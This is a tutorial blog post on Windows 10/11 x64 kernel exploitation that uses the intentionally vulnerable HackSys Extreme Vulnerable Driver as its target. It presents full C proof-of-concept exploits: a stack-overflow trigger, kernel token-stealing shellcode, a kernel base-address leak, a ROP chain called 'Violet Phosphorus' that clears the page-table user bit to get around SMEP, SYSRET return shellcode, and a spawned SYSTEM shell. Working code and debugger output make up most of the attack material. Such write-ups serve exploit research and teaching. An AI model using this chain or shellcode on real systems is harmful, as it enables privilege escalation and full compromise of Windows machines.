This post was made possible through hard work and determination. Do not feel frustrated if this stuff does not click immediately and remember, the source of truth will always be the source code. For us, our source code is raw assembly. That said it’s important you understand these techniques in detail because when Microsoft releases new mitigations your foundation is what will allow you to develop bypasses. So, if something is not clear take your time and step through it in the debugger.

In the last post you should have obtained a solid understanding of the basics of Windows Kernel Exploitation. We will now be jumping off the deep end and exploiting Windows 10 (x64) and Windows 11 (x64). Within this post you will be getting an introduction to some of the latest exploit mitigations offered by Microsoft and how “easily” they can be bypassed. That said only SOME will be covered, more exist but we will only cover them when relevant within this series.

In addition, this post will include the release of my PoC ROP chain - Violet Phosphorus, a universal VBS/SMEP bypass technique.

To prove its effectiveness, I went ahead deployed Violet Phosphorus against Windows 11 24H2 just for this post. If I understand correctly this is the latest version of Windows 11 which was released October 1st, 2024.

DISCLAIMER: TO BE CLEAR THIS DOES NOT BYPASS HVCI, AT THE TIME OF WRITING I BELIEVED THIS TO BYPASS HVCI. THIS POST ONLY CONTAINS A SMEP BYPASS. ADDITIONALLY EXPLOITS IN THIS SERIES WERE TESTED PRIMARILY ON: WINDOWS 11 (x64) - 10.0.22000 N/A Build 22000

Table of Contents

Entering the Modern Landscape

Considering we exploited the Stack Overflow within Windows 7 (x86) and having gone in depth in regards to it’s underlying operations. There was no need to re-hash the vulnerability, at least not for this type of bug. That said, we can go ahead and jump straight into exploit development for Windows 10 (x64).

As mentioned in the last post we will shift languages and use C rather than Python. If you’re using Kali and want to follow along with me, install mingw-w64 as this will be what I will be using to compile my exploit code. You can also use Visual Studio it’s all based on preference really.

sudo apt install mingw-w64 -y

If you’re still new to C, the following can also be accomplished in Python. I intentionally used it in the last post for those who want to jump in without using C. However, you will see that the further you get into exploit development knowledge of C is not optional. That said let’s look at our initial PoC code:

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>

#define BUFFER_SIZE 4242

int main()
{
    HANDLE hHEVD                = NULL;
    DWORD bytesReturned         = 0;
    char buffer[BUFFER_SIZE]    = {0};

    printf("[*] Getting a handle on HEVD\n");

    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Generating evil buffer...");
    memset(buffer, 'A', 3000);

    printf("[*] Triggering control code 0x222003\n");
    DeviceIoControl(hHEVD,
                    0x222003,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);
}

We can compile it using a cross compiler from mingw from within Linux (x86_64-w64-mingw32-gcc poc.c -o poc.exe). Once sent, we can see that we have successfully achieved memory corruption :)

alt text

Let’s update the PoC this time we’ll include shellcode (Generated with Sickle).

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#include <windows.h>

#define BUFFER_SIZE 4242

int main()
{
    HANDLE hHEVD = NULL;
    LPVOID lpMemory = NULL;
    DWORD bytesReturned = 0;

    int i = 0;
    int shellcodeLength = 62;
    int64_t buffer[BUFFER_SIZE] = {0};

    char shellcode[] =
    // python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint

    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x48\x8b\x80\xb8\x00\x00\x00"                 // mov rax, qword ptr [rax + 0xb8]
    "\x48\x89\xc1"                                 // mov rcx, rax
    "\xb2\x04"                                     // mov dl, 4
    "\x48\x8b\x80\x48\x04\x00\x00"                 // mov rax, qword ptr [rax + 0x448]
    "\x48\x2d\x48\x04\x00\x00"                     // sub rax, 0x448
    "\x38\x90\x40\x04\x00\x00"                     // cmp byte ptr [rax + 0x440], dl
    "\x75\xeb"                                     // jne 0x1017
    "\x48\x8b\x90\xb8\x04\x00\x00"                 // mov rdx, qword ptr [rax + 0x4b8]
    "\x48\x89\x91\xb8\x04\x00\x00"                 // mov qword ptr [rcx + 0x4b8], rdx

    "\x5d"          // pop rbp
    "\xc2\x08\x00"; // ret 8


    printf("[*] Getting a handle on HEVD\n");

    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Allocating RWX memory\n");
    lpMemory = VirtualAlloc(NULL,
                            shellcodeLength,
                            (MEM_COMMIT | MEM_RESERVE),
                            PAGE_EXECUTE_READWRITE);

    printf("[*] Copying shellcode into RWX memory\n");
    memcpy(lpMemory, shellcode, shellcodeLength);

    printf("[*] Spraying return address: 0x%p\n", lpMemory);
    for (i = 0; i < 270; i++)
    {
        /* Spray the return address, who cares about accuracy ;) */
        buffer[i] = (int64_t)lpMemory;
    }

    printf("[*] Triggering control code 0x222003\n");
    DeviceIoControl(hHEVD,
                    0x222003,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);
}

Let’s try to allocate memory as we did before in Windows 7 (x86). When we jump to it we get the following error:

alt text

After a bit of research on the error we can confirm we’re dealing with SMEP (Supervisor Mode Execution Prevention) which is a memory protection built into modern Windows OS’s since Windows 8. Assuming you’re familiar with userland exploitation imagine this as DEP only the focus is preventing code execution within user-mode memory. This is oversimplifying it but for the sake of this tutorial we won’t dive any deeper. All we need to do is find a way to bypass it, that is our objective.

Bypassing SMEP (Theory)

To bypass SMEP we’re likely going to need to deploy some ROP, just as we would if we encountered DEP in a user-mode context. If you’re familiar with Linux Kernel exploitation your brain might also go to SMAP. This is good since we’ll be dealing with bits. In short, SMEP is enabled by setting the 20th bit of the CR4 register. In theory, this can be modified by the Kernel, hence why ROP is an ideal technique to deploy.

Let’s look at this in WinDbg.

alt text

When flipping the bits of any number, we are in essence changing the value. To see what number we’d need to place here be representative of flipping the 20th bit I wrote a simple C program to generate the number for me. The code to do this, can be seen below:

/* wetw0rk */

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

// https://stackoverflow.com/questions/111928/is-there-a-printf-converter-to-print-in-binary-format
#define PRINTF_BINARY_PATTERN_INT8 "%c%c%c%c%c%c%c%c "
#define PRINTF_BYTE_TO_BINARY_INT8(i)    \
    (((i) & 0x80ll) ? '1' : '0'), \
    (((i) & 0x40ll) ? '1' : '0'), \
    (((i) & 0x20ll) ? '1' : '0'), \
    (((i) & 0x10ll) ? '1' : '0'), \
    (((i) & 0x08ll) ? '1' : '0'), \
    (((i) & 0x04ll) ? '1' : '0'), \
    (((i) & 0x02ll) ? '1' : '0'), \
    (((i) & 0x01ll) ? '1' : '0')

#define PRINTF_BINARY_PATTERN_INT16 \
    PRINTF_BINARY_PATTERN_INT8              PRINTF_BINARY_PATTERN_INT8
#define PRINTF_BYTE_TO_BINARY_INT16(i) \
    PRINTF_BYTE_TO_BINARY_INT8((i) >> 8),   PRINTF_BYTE_TO_BINARY_INT8(i)
#define PRINTF_BINARY_PATTERN_INT32 \
    PRINTF_BINARY_PATTERN_INT16             PRINTF_BINARY_PATTERN_INT16
#define PRINTF_BYTE_TO_BINARY_INT32(i) \
    PRINTF_BYTE_TO_BINARY_INT16((i) >> 16), PRINTF_BYTE_TO_BINARY_INT16(i)
#define PRINTF_BINARY_PATTERN_INT64    \
    PRINTF_BINARY_PATTERN_INT32             PRINTF_BINARY_PATTERN_INT32
#define PRINTF_BYTE_TO_BINARY_INT64(i) \
    PRINTF_BYTE_TO_BINARY_INT32((i) >> 32), PRINTF_BYTE_TO_BINARY_INT32(i)

/*
 * flip_bit: simple function to flip a bit, for CR4 this would be 20
 */
uint64_t flip_bit(uint64_t cr4, unsigned int bit_position)
{
  unsigned int mask = 1 << (bit_position - 1);
  return (cr4 ^ mask);
}

int main(int argc, char *argv[])
{
  uint64_t num = 0;

  if (argc < 2) {
    printf("Usage: %s <current cr4 value>\n", argv[0]);
    return -1;
  }

  num = strtoll(argv[1], NULL, 0);

  printf("OLD CR4:\n\n\t");
  printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num));
  putchar('\n');

  num = flip_bit(num, 20);

  printf("NEW CR4\n\n\t");
  printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num));
  putchar('\n');

  printf("\nResult: 0x%lx\n", num);
}

Let’s run it.

$ ./get_cr4 0x0000000000b50ef8
OLD CR4:

        00000000 00000000 00000000 00000000 00000000 10110101 00001110 11111000 
NEW CR4

        00000000 00000000 00000000 00000000 00000000 10111101 00001110 11111000 

Result: 0xbd0ef8

So basically we have to place this value into CR4 to turn off SMEP… While researching this I came across a blog post by fluidattacks and noticed he used a ROP gadget in the nt module, specifically KeFlushCurrentTb. We can get our current running version using WinDbg via vertarget. When ran on our target, this was the currently installed Windows version:

alt text

That said, this gadget would not be available to us. If we check for other similar functions we find a similar gadget within nt!KeFlushCurrentTbImmediatley with the main difference being RCX being used to modify CR4 instead of EAX:

alt text

Since addresses are randomized, we need to calculate the offset of that ROP gadget from the start of the nt module:

alt text

Here we see the offset is 0x000000000039dc27.

Finding & Using ROP Gadgets

Now we need to find a pop rcx; ret gadget to place the new CR4 value into RCX. We can find one using rp++, which has quickly become my favorite ROP gadget tool. Here we search for gadgets within ntoskrnl.exe since this is the primary kernel file for the Windows OS. To do this you can use the following syntax:

rp-win.exe --rop=50 --va=0 --file C:\Windows\System32\ntoskrnl.exe > rop.txt

We can then parse the results using powershell.

alt text

Using these offsets we can confirm we have a working gadget in WinDbg.

alt text

However, we still have to deal with the randomization of the nt module itself…

Finding the Kernel Base Address

If you peeked into my brain during this period of learning, you would have observed unadulterated fear. Since under a user-mode exploit you would normally now require a read primitive to get the base address of a loaded module. However, with a little bit of research you’ll find there are multiple methods to obtain the base address of nt (or any other loaded module for that matter) from medium integrity (default user configuration).

I ended up using a known method of leveraging EnumDeviceDrivers to obtain the base address.

The code I used can be seen below:

int GetKernelBaseAddress()
{
    ULONG_PTR pKernelBaseAddress = 0;
    LPVOID *lpImageBase = NULL;
    DWORD dwBytesNeeded = 0;

    if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) {
        printf("[-] Failed to calculate bytes needed for device driver entries");
        return -1;
    }

    if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) {
        printf("[-] Failed to allocate heap for lpImageBase\n");
        if (lpImageBase) {
            HeapFree(GetProcessHeap(), 0, lpImageBase);
        }
        return -1;
    }

    if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) {
        printf("[-] EnumDeviceDrivers: %d", GetLastError());
        if (lpImageBase) {
             HeapFree(GetProcessHeap(), 0, lpImageBase);
        }
        return -1;
    }

    pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0];
    HeapFree(GetProcessHeap(), 0, lpImageBase);

    printf("[*] Kernel Base Address: %llx\n", pKernelBaseAddress);

    return pKernelBaseAddress;
}

With that we should have everything needed to get code execution! Right? Wrong :(

alt text

When putting everything together, we get the error above (ignore the different gadget location I tried changing it at this point because I could not fathom this not working).

What happened? Well… it looks like we encountered a new memory protection that I have not heard of. We’ve run into Virtualization-Based Security (VBS), which means any “unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly”.

Bypassing VBS (Theory)

Having conducted a bit of research into how others have approached this, the idea here is to flip a bit within a Page Table Entry (PTE) respective to the memory location of our usermode shellcode.

If we recall when we tried to execute the shellcode directly we got the following error:

alt text

Basically, the way SMEP is enforced is on a per memory basis, via the U/S PTE control bit. Let’s look at the output of !pte in WinDbg in regards to the user mode shellcode allocation to try to understand the page table entry permissions.

alt text

So what would happen if we were to clear the user mode bit (U)? If flipped, this page in thoery becomes a Kernel mode page. The bit location of U can be seen below.

alt text

Let’s set a breakpoint at HEVD+0x866b9 and reboot to test this. Once our breakpoint is hit, we can modify the PTE as shown below. Once execution is continued you can see we successfully get code execution as we overwrite RAX with 0xDEADBEEF (psuedo shellcode).

alt text

Sweet, we have a solid bypass route for SMEP and VBS but how can we do this dynamically…

Violet Phosphorus

With our analysis complete I decided to put my theory into practice and created Violet Phosphorus a universal and generic SMEP/VBS bypass. Can we call this the successor of the White Phosphorus Exploit Pack? Or would that be too much… you can find the ROP chain below:

  /* Prepare RDX register for later. This is needed for the XOR operation */
  buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
  buffer[i++] =               0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR
  buffer[i++] =               0x000000; // [filler]
  buffer[i++] =               0x000000; // [filler]

  /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
     userland code. The setup is as follows:
  
       RAX -> VOID *MiGetPteAddress(
         ( RCX == PTE / Userland Code )
       );

     Once the call is complete RAX should contain the pointer to our PTE. */
  buffer[i++] = kernel_base + 0xa74d93; // pop rcx ; ret     [nt]
  buffer[i++] = (int64_t)shellcode;     // *shellcode        [nt]
  buffer[i++] = kernel_base + 0x26b560; // MiGetPteAddress() [nt]

  /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to
     mark the page as a kernel page (U -> K). We can do this using XOR ;) */
  buffer[i++] = kernel_base + 0x2ffbfb; // sub rax, rdx ; ret                [nt]
  buffer[i++] = kernel_base + 0xa6f2f5; // push rax ; pop rbx ; ret          [nt]
  buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
  buffer[i++] =               0x000004; // When we XOR the PTE by 0x4 we flip the 2nd bit (U -> K)
  buffer[i++] =               0x000000; // [filler]
  buffer[i++] =               0x000000; // [filler]
  buffer[i++] = kernel_base + 0x2107b2; // xor  [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret [nt]

Understanding the ROP Chain

Let’s be honest there exists other ways to bypass VBS/SMEP but from what I’ve seen most require a leak. Why suffer when Microsoft gives us a function to get this information dynamically? Below is the ASM code within WinDbg of the MiGetPteAddress() function.

0: kd> u nt!MiGetPteAddress
nt!MiGetPteAddress:
fffff800`4d67f770 48c1e909                shr     rcx,9
fffff800`4d67f774 48b8f8ffffff7f000000    mov rax,7FFFFFFFF8h
fffff800`4d67f77e 4823c8                  and     rcx,rax
fffff800`4d67f781 48b80000000080f0ffff    mov rax,0FFFFF08000000000h
fffff800`4d67f78b 4803c1                  add     rax,rcx
fffff800`4d67f78e c3                      ret

From what I’ve seen in the “wild”, people normally use this function to get the base address of all PTE’s. Let’s take a step back and ask ourselves what does this function actually do when called? We don’t even need Ghidra for this to be honest. Let’s write the C equivalent to this:

/* wetw0rk */

#include <stdio.h>
#include <stdint.h>

int64_t MiGetPteAddress(int64_t rcx)
{
    int64_t rax = 0x00;

    rcx = rcx >> 9;
    rax = 0x7FFFFFFFF8;
    rcx = rcx & rax;
    rax = 0x0FFFFF08000000000;
    rax = rax + rcx;
    return rax;
}

int main() {
    printf("PTE Located @{ 0x%llx }\n", MiGetPteAddress(0x00000220c16d0000));
}

If we compile this we see it gives us the the address of the PTE.

┌──(wetw0rk㉿kali)-[~]
└─$ gcc MiGetPteAddress.c -o meme
                                                                                                                                                                                                                                             
┌──(wetw0rk㉿kali)-[~]
└─$ ./meme 
PTE Located @{ 0xfffff0811060b680 }

This means we can leverage this existing function to manipulate the PTE directly. After all, we are running under the context of the Kernel so we can call Bill Gates if we want to. To summarize all we need to do is pass this function the address of our shellcode and in return this function will return the PTE respective to our allocation. How nice :)

Once we have the address of the PTE, we simply dereference it and flip the U bit to a K bit. What insane mathematical operation must we do to accomplish such a task?

That’s right - XOR!

>>> "0x" + hex(0x0000000226D83867 ^ 4)[2:].zfill(16)
'0x0000000226d83863'

You know what this means right?

alt text

Crafting a PoC

At this point we have everything we need to get code execution… except returning to Userland. Normally it’s best to restore execution flow manually. However, I decided to instead use Kristal-G’s SYSRET shellcode - a technique that allows for a generic return from the Kernel. From my understanding this is the first of its kind (other than the Linux variant). You can generate Kristal-G’s shellcode using Sickle as shown below:

┌──(wetw0rk㉿kali)-[/opt/Sickle/src]
└─$ python3 sickle.py -p windows/x64/kernel_sysret -f c -m pinpoint
"\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
"\x66\x8b\x88\xe4\x01\x00\x00"                 // mov cx, word ptr [rax + 0x1e4]
"\x66\xff\xc1"                                 // inc cx
"\x66\x89\x88\xe4\x01\x00\x00"                 // mov word ptr [rax + 0x1e4], cx
"\x48\x8b\x90\x90\x00\x00\x00"                 // mov rdx, qword ptr [rax + 0x90]
"\x48\x8b\x8a\x68\x01\x00\x00"                 // mov rcx, qword ptr [rdx + 0x168]
"\x4c\x8b\x9a\x78\x01\x00\x00"                 // mov r11, qword ptr [rdx + 0x178]
"\x48\x8b\xa2\x80\x01\x00\x00"                 // mov rsp, qword ptr [rdx + 0x180]
"\x48\x8b\xaa\x58\x01\x00\x00"                 // mov rbp, qword ptr [rdx + 0x158]
"\x31\xc0"                                     // xor eax, eax
"\x0f\x01\xf8"                                 // swapgs 
"\x48\x0f\x07"                                 // sysretq

Below is the PoC code, however offsets may be different on your build of Windows.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#include <windows.h>
#include <psapi.h>

// I/O Request Packets (IRPs)
#define TRIGGER_BUFFER_OVERFLOW_STACK 0x222003

#define BUFFER_SIZE 4242

uint64_t GetKernelBaseAddress()
{
    ULONG_PTR pKernelBaseAddress = 0;
    LPVOID *lpImageBase = NULL;
    DWORD dwBytesNeeded = 0;

    if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) {
        printf("[-] Failed to calculate bytes needed for device driver entries");
        return -1;
    }

    if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) {
        printf("[-] Failed to allocate heap for lpImageBase\n");
        if (lpImageBase) {
            HeapFree(GetProcessHeap(), 0, lpImageBase);
        }
        return -1;
    }

    if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) {
        printf("[-] EnumDeviceDrivers: %d", GetLastError());
        if (lpImageBase) {
            HeapFree(GetProcessHeap(), 0, lpImageBase);
        }
        return -1;
    }

    pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0];
    HeapFree(GetProcessHeap(), 0, lpImageBase);

    printf("[*] Kernel Base Address: %llx\n", pKernelBaseAddress);

    return pKernelBaseAddress;
}

void GenerateBuffer(int64_t *buffer, int64_t kernel_base, LPVOID shellcode)
{
    int64_t i = 259;
    int64_t j = 0;

    printf("[*] Generating buffer to bypass VPS and disable SMEP\n");

    /* Prepare RDX register for later. This is needed for the XOR operation */
    buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
    buffer[i++] =               0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR
    buffer[i++] =               0x000000; // [filler]
    buffer[i++] =               0x000000; // [filler]

    /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
       userland code. The setup is as follows:
  
         RAX -> VOID *MiGetPteAddress(
           ( RCX == PTE / Userland Code )
         );

       Once the call is complete RAX should contain the pointer to our PTE. */
    buffer[i++] = kernel_base + 0xa74d93; // pop rcx ; ret     [nt]
    buffer[i++] = (int64_t)shellcode;     // *shellcode        [nt]
    buffer[i++] = kernel_base + 0x26b560; // MiGetPteAddress() [nt]

    /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to
       mark the page as a kernel page (U -> K). We can do this using XOR ;) */
    buffer[i++] = kernel_base + 0x2ffbfb; // sub rax, rdx ; ret                [nt]
    buffer[i++] = kernel_base + 0xa6f2f5; // push rax ; pop rbx ; ret          [nt]
    buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
    buffer[i++] =               0x000004; // When we XOR the PTE by 0x4 we flip the 2nd bit (U -> K)
    buffer[i++] =               0x000000; // [filler]
    buffer[i++] =               0x000000; // [filler]
    buffer[i++] = kernel_base + 0x2107b2; // xor  [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret [nt]

    /* Now we can spray our shellcode address since SMEP and VPS should be bypassed */
    for (j = 0; j < 0xC; j++) {
        buffer[i++] = (int64_t)shellcode;
    }

    printf("[*] Calling shellcode: 0x%p\n", shellcode);
}

int main()
{
    HANDLE hHEVD                          = NULL;
    DWORD bytesReturned                   = 0;
    int64_t buffer[BUFFER_SIZE]           = {0};
    int64_t kernelBaseAddr                = 0;
    LPVOID lpMemory                       = NULL;

    char shellcode[] =
    // python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint
    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x48\x8b\x80\xb8\x00\x00\x00"                 // mov rax, qword ptr [rax + 0xb8]
    "\x48\x89\xc1"                                 // mov rcx, rax
    "\xb2\x04"                                     // mov dl, 4
    "\x48\x8b\x80\x48\x04\x00\x00"                 // mov rax, qword ptr [rax + 0x448]
    "\x48\x2d\x48\x04\x00\x00"                     // sub rax, 0x448
    "\x38\x90\x40\x04\x00\x00"                     // cmp byte ptr [rax + 0x440], dl
    "\x75\xeb"                                     // jne 0x1017
    "\x48\x8b\x90\xb8\x04\x00\x00"                 // mov rdx, qword ptr [rax + 0x4b8]
    "\x48\x89\x91\xb8\x04\x00\x00"                 // mov qword ptr [rcx + 0x4b8], rdx
 
    // python3 sickle.py -p windows/x64/kernel_sysret -f c -m pinpoint
    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x66\x8b\x88\xe4\x01\x00\x00"                 // mov cx, word ptr [rax + 0x1e4]
    "\x66\xff\xc1"                                 // inc cx
    "\x66\x89\x88\xe4\x01\x00\x00"                 // mov word ptr [rax + 0x1e4], cx
    "\x48\x8b\x90\x90\x00\x00\x00"                 // mov rdx, qword ptr [rax + 0x90]
    "\x48\x8b\x8a\x68\x01\x00\x00"                 // mov rcx, qword ptr [rdx + 0x168]
    "\x4c\x8b\x9a\x78\x01\x00\x00"                 // mov r11, qword ptr [rdx + 0x178]
    "\x48\x8b\xa2\x80\x01\x00\x00"                 // mov rsp, qword ptr [rdx + 0x180]
    "\x48\x8b\xaa\x58\x01\x00\x00"                 // mov rbp, qword ptr [rdx + 0x158]
    "\x31\xc0"                                     // xor eax, eax
    "\x0f\x01\xf8"                                 // swapgs 
    "\x48\x0f\x07";                                // sysretq


    int shellcodeLength = (58 + 71);

    kernelBaseAddr = GetKernelBaseAddress();

    printf("[*] Getting a handle on HEVD\n");

    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Allocating RWX memory\n");
    lpMemory = VirtualAlloc(NULL,
                            shellcodeLength,
                            (MEM_COMMIT | MEM_RESERVE),
                            PAGE_EXECUTE_READWRITE);

    printf("[*] Copying shellcode into RWX memory\n");
    memcpy(lpMemory, shellcode, shellcodeLength);

    printf("[*] Spraying return address: 0x%p\n", lpMemory);
    GenerateBuffer(buffer, kernelBaseAddr, lpMemory);

    printf("[*] Triggering control code 0x222003\n");
    DeviceIoControl(hHEVD,
                    TRIGGER_BUFFER_OVERFLOW_STACK,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);

    system("C:\\Windows\\System32\\cmd.exe");
}

Exploitation (Rip & Tear)

When writing this post I was so confident in my technique I decided to weaponize it and test it against the latest build of Windows 11, and it worked!

alt text

It’s important to keep in mind I had to perform modifications to the aforementioned information. As an example, Token Stealing Shellcode offsets have changed, this was an interesting observation and I plan to update shellcode within Sickle to perform version checking for accurate structure offsets.

Sources

https://connormcgarr.github.io/pte-overwrites/
https://m0uk4.gitbook.io/notebooks/mouka/windowsinternal/find-kernel-module-address-todo
https://wumb0.in/finding-the-base-of-the-windows-kernel.html
https://idafchev.github.io/research/2023/06/30/Vulnerable_Driver_Part2.html
https://fluidattacks.com/blog/hevd-smep-bypass/
https://h0mbre.github.io/HEVD_Stackoverflow_SMEP_Bypass_64bit/#
https://www.coresecurity.com/sites/default/files/2020-06/Windows%20SMEP%20bypass%20U%20equals%20S_0.pdf
https://kristal-g.github.io/2021/02/07/HEVD_StackOverflowGS_Windows_10_RS5_x64.html